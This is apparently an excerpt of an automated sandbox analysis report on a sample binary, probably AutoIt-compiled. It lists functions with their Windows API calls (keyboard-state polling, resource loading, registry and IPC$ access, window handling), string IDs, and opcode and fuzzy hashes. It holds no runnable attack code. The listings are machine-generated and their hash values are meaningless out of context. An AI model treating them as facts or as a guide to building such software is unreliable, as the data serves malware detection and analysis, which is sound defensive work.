                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                            • API String ID: 1687751970-22481851
                                                                            • Opcode ID: 9b62aa75d0e16d20b99ed6d89c3f0b86a753bd7fcaa66db73bebb4e65b3e87d9
                                                                            • Instruction ID: 9d5862abaab62c305cafcbc2a7816bb8bb221bc1fc013f25f62c77b25eec1742
                                                                            • Opcode Fuzzy Hash: 9b62aa75d0e16d20b99ed6d89c3f0b86a753bd7fcaa66db73bebb4e65b3e87d9
                                                                            • Instruction Fuzzy Hash: C9410676C11629ABDF16EBA4DC95DEEB7B8BF04700F004569F901B71A1EB709E05CB90
                                                                            Function 003467E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __swprintf.LIBCMT ref: 003467FD
                                                                            • __swprintf.LIBCMT ref: 0034680A
                                                                              • Part of subcall function 0032172B: __woutput_l.LIBCMT ref: 00321784
                                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 00346834
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 00346840
                                                                            • LockResource.KERNEL32(00000000), ref: 0034684D
                                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 0034686D
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 0034687F
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0034688E
                                                                            • LockResource.KERNEL32(?), ref: 0034689A
                                                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 003468F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                            • String ID: 5;
                                                                            • API String ID: 1433390588-4144742158
                                                                            • Opcode ID: 6f38d1165ec55b4936b3bf37d8daf8db416daf4566d7231f1122fa4ed5e852b2
                                                                            • Instruction ID: ecd7a9974e7b79e497de6ebfb3bed85d0d805340190ff43a66cb5eb2ce89f861
                                                                            • Opcode Fuzzy Hash: 6f38d1165ec55b4936b3bf37d8daf8db416daf4566d7231f1122fa4ed5e852b2
                                                                            • Instruction Fuzzy Hash: EA31707190021AABDB129F60ED56EBFBBECFF09340F004825F902EA151E734E911DB61
                                                                            Function 003425B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003736F4,00000010,?,Bad directive syntax error,0039DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003425D6
                                                                            • LoadStringW.USER32(00000000,?,003736F4,00000010), ref: 003425DD
                                                                            • _wprintf.LIBCMT ref: 00342610
                                                                            • __swprintf.LIBCMT ref: 00342632
                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003426A1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                            • API String ID: 1080873982-4153970271
                                                                            • Opcode ID: da9f720ae6d1e854f1f4af19fd3cd9f75bbabd451d8e41d4e3413efdb14ffb01
                                                                            • Instruction ID: 0278ca94ff7300b7fdb194c69c1155ebbfbd2c69707c89e905f00b5da122018f
                                                                            • Opcode Fuzzy Hash: da9f720ae6d1e854f1f4af19fd3cd9f75bbabd451d8e41d4e3413efdb14ffb01
                                                                            • Instruction Fuzzy Hash: 22212E3190022ABFCF17AB90DC5AEEE7779BF18304F444455F5056A0A2EA75AA14DF60
                                                                            Function 00347AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00347B42
                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00347B58
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00347B69
                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00347B7B
                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00347B8C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: SendString
                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                            • API String ID: 890592661-1007645807
                                                                            • Opcode ID: 637a47069d744ae1bc459f3790d1d3b33915fd20ba230f8f1d6e1ef08160cc75
                                                                            • Instruction ID: f4e6d1c63b60f4c7856c05e418d5b906f29f2f73f95cb44c1346319ceb06b74c
                                                                            • Opcode Fuzzy Hash: 637a47069d744ae1bc459f3790d1d3b33915fd20ba230f8f1d6e1ef08160cc75
                                                                            • Instruction Fuzzy Hash: 7111C4F069126979D722B761CC5BDFFBABCEB91B14F000519B511AA0C1EE602A48CAB0
                                                                            Function 0034778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 00347794
                                                                              • Part of subcall function 0031DC38: timeGetTime.WINMM(?,76AAB400,003758AB), ref: 0031DC3C
                                                                            • Sleep.KERNEL32(0000000A), ref: 003477C0
                                                                            • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 003477E4
                                                                            • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00347806
                                                                            • SetActiveWindow.USER32 ref: 00347825
                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00347833
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00347852
                                                                            • Sleep.KERNEL32(000000FA), ref: 0034785D
                                                                            • IsWindow.USER32 ref: 00347869
                                                                            • EndDialog.USER32(00000000), ref: 0034787A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                            • String ID: BUTTON
                                                                            • API String ID: 1194449130-3405671355
                                                                            • Opcode ID: 855ae5d11bc5a7548af1b84ffa8e3627fcfaa2b72fe88b3c29ee2ded8f326aa5
                                                                            • Instruction ID: 6503217fb2d81fa74e3667426f8bcb6c186bd60e84b3b8543692ca115173ea9f
                                                                            • Opcode Fuzzy Hash: 855ae5d11bc5a7548af1b84ffa8e3627fcfaa2b72fe88b3c29ee2ded8f326aa5
                                                                            • Instruction Fuzzy Hash: 4F2158B4204349AFE7035B20EC8DEA63FADFB49348F418465F546CA1A2DB65BC04DB61
                                                                            Function 003502EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
                                                                              • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
                                                                            • CoInitialize.OLE32(00000000), ref: 0035034B
                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003503DE
                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 003503F2
                                                                            • CoCreateInstance.OLE32(0038DA8C,00000000,00000001,003B3CF8,?), ref: 0035043E
                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003504AD
                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00350505
                                                                            • _memset.LIBCMT ref: 00350542
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0035057E
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003505A1
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 003505A8
                                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003505DF
                                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 003505E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                            • String ID:
                                                                            • API String ID: 1246142700-0
                                                                            • Opcode ID: 9b8d9dc1036c0a5673b11e8d22c1e3829f70d1d62e133962766bc7047ce33d90
                                                                            • Instruction ID: 5539460e0bc39ab5575810ff6a72c7167c45936ab039a35f22817728c092a80b
                                                                            • Opcode Fuzzy Hash: 9b8d9dc1036c0a5673b11e8d22c1e3829f70d1d62e133962766bc7047ce33d90
                                                                            • Instruction Fuzzy Hash: 8CB1F975A00208AFDB05DFA4C898DAEBBB9FF48305F1484A9E905EB261DB31ED45CF50
                                                                            Function 00342E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 00342ED6
                                                                            • SetKeyboardState.USER32(?), ref: 00342F41
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00342F61
                                                                            • GetKeyState.USER32(000000A0), ref: 00342F78
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00342FA7
                                                                            • GetKeyState.USER32(000000A1), ref: 00342FB8
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00342FE4
                                                                            • GetKeyState.USER32(00000011), ref: 00342FF2
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 0034301B
                                                                            • GetKeyState.USER32(00000012), ref: 00343029
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00343052
                                                                            • GetKeyState.USER32(0000005B), ref: 00343060
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: f04eac8083ad4c010402da1148325e07d07376e0a2eedd1d0093aab24315b4f9
                                                                            • Instruction ID: a6a0f7b4d83f8799cbeff60e64c8664baf9a4a2ae86b450c0c790705a8c8a87d
                                                                            • Opcode Fuzzy Hash: f04eac8083ad4c010402da1148325e07d07376e0a2eedd1d0093aab24315b4f9
                                                                            • Instruction Fuzzy Hash: FC519660A0478429FB37DBA488517EABFF49F11340F89459AE5C26F1C2DA54BB8CC762
                                                                            Function 0033ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000001), ref: 0033ED1E
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0033ED30
                                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0033ED8E
                                                                            • GetDlgItem.USER32(?,00000002), ref: 0033ED99
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0033EDAB
                                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0033EE01
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0033EE0F
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0033EE20
                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0033EE63
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 0033EE71
                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0033EE8E
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0033EE9B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                            • String ID:
                                                                            • API String ID: 3096461208-0
                                                                            • Opcode ID: 903e52c4b088b01cbbf22e8de0f5e0ead37e3fb206d68bac9fe6590d97203536
                                                                            • Instruction ID: 79fa7c07ca18385a3bba0a15971df9cfef33662561380420aec4e9d86e5f4386
                                                                            • Opcode Fuzzy Hash: 903e52c4b088b01cbbf22e8de0f5e0ead37e3fb206d68bac9fe6590d97203536
                                                                            • Instruction Fuzzy Hash: 00512EB1B00309AFDF19DF69DD85AAEBBBAEB88310F558169F519D72D0E7709D008B10
                                                                            Function 0031B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0031B759,?,00000000,?,?,?,?,0031B72B,00000000,?), ref: 0031BA58
                                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0031B72B), ref: 0031B7F6
                                                                            • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0031B72B,00000000,?,?,0031B2EF,?,?), ref: 0031B88D
                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 0037D8A6
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0031B72B,00000000,?,?,0031B2EF,?,?), ref: 0037D8D7
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0031B72B,00000000,?,?,0031B2EF,?,?), ref: 0037D8EE
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0031B72B,00000000,?,?,0031B2EF,?,?), ref: 0037D90A
                                                                            • DeleteObject.GDI32(00000000), ref: 0037D91C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 641708696-0
                                                                            • Opcode ID: a85146e79bc64df3cc95bd3ed414b8303a19360d2bc25413990b07b0f950f24f
                                                                            • Instruction ID: d7f8e9f17d28eb5667b0be79e958c7b2d0e56d9aa5d8cd2b773fd19ca9668994
                                                                            • Opcode Fuzzy Hash: a85146e79bc64df3cc95bd3ed414b8303a19360d2bc25413990b07b0f950f24f
                                                                            • Instruction Fuzzy Hash: 80617731500701DFDB3B9F14D988BA5F7B9FF9A715F15411DE4868AAA0C774A8E0EB80
                                                                            Function 0031B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031B526: GetWindowLongW.USER32(?,000000EB), ref: 0031B537
                                                                            • GetSysColor.USER32(0000000F), ref: 0031B438
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ColorLongWindow
                                                                            • String ID:
                                                                            • API String ID: 259745315-0
                                                                            • Opcode ID: 0eabc1a200695e46d0119c2b7a0ace90b7988f452665b63978e9b7b3d8f529d7
                                                                            • Instruction ID: f380161633bf5d15bc416476c1d986caaa584b8f5f9997e384fc0f38ad6d8e56
                                                                            • Opcode Fuzzy Hash: 0eabc1a200695e46d0119c2b7a0ace90b7988f452665b63978e9b7b3d8f529d7
                                                                            • Instruction Fuzzy Hash: 414193300001449BDF375F69D889BF9776AAF4A731F198291FD658E5E6DB308C81D721
                                                                            Function 0034690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                            • String ID:
                                                                            • API String ID: 136442275-0
                                                                            • Opcode ID: 42d07a96302098baa001b39d94da6d55ba56ee1dce2cebebee884dcb2fb4f8fb
                                                                            • Instruction ID: cbdddcacabfabb73eed64a2a73e306b3ae91e1ee07be01a6ffb6c9ba2a68be11
                                                                            • Opcode Fuzzy Hash: 42d07a96302098baa001b39d94da6d55ba56ee1dce2cebebee884dcb2fb4f8fb
                                                                            • Instruction Fuzzy Hash: 4D4121B684512CAFCF66DB90DC46DDB73BCEB44300F0041A6F659AA051EA70A7E88F51
                                                                            Function 0034D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(0039DC00,0039DC00,0039DC00), ref: 0034D7CE
                                                                            • GetDriveTypeW.KERNEL32(?,003B3A70,00000061), ref: 0034D898
                                                                            • _wcscpy.LIBCMT ref: 0034D8C2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                            • API String ID: 2820617543-1000479233
                                                                            • Opcode ID: 24f5432f69e03b46ea5c04fa4582ff234aaaea19df9eebbe982f9e57a49c3211
                                                                            • Instruction ID: 6219d4a01484e62e4e52a224a00aa90d7b4876f74900b2663770578bfd726783
                                                                            • Opcode Fuzzy Hash: 24f5432f69e03b46ea5c04fa4582ff234aaaea19df9eebbe982f9e57a49c3211
                                                                            • Instruction Fuzzy Hash: 87516235104301AFC706EF14DC91AAEB7E5EF98314F20892DF99A5F2A2DB71ED45CA42
                                                                            Function 0030936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __swprintf.LIBCMT ref: 003093AB
                                                                            • __itow.LIBCMT ref: 003093DF
                                                                              • Part of subcall function 00321557: _xtow@16.LIBCMT ref: 00321578
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __itow__swprintf_xtow@16
                                                                            • String ID: %.15g$0x%p$False$True
                                                                            • API String ID: 1502193981-2263619337
                                                                            • Opcode ID: 62b025710b14969667ee63813ff012723a6097eb75b79a3c2e24b01d6fb5d463
                                                                            • Instruction ID: 1564bd00668b0f2d80f851f33a5936c15d2cf774d61d220d4900e33f0caf59b4
                                                                            • Opcode Fuzzy Hash: 62b025710b14969667ee63813ff012723a6097eb75b79a3c2e24b01d6fb5d463
                                                                            • Instruction Fuzzy Hash: 8941E575501215AFDB2BDB78D951FAAB3E8EF48300F2084AAE149DB1D2EB35E941CB10
                                                                            Function 0036A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0036A259
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0036A260
                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0036A273
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0036A27B
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0036A286
                                                                            • DeleteDC.GDI32(00000000), ref: 0036A28F
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0036A299
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0036A2AD
                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0036A2B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
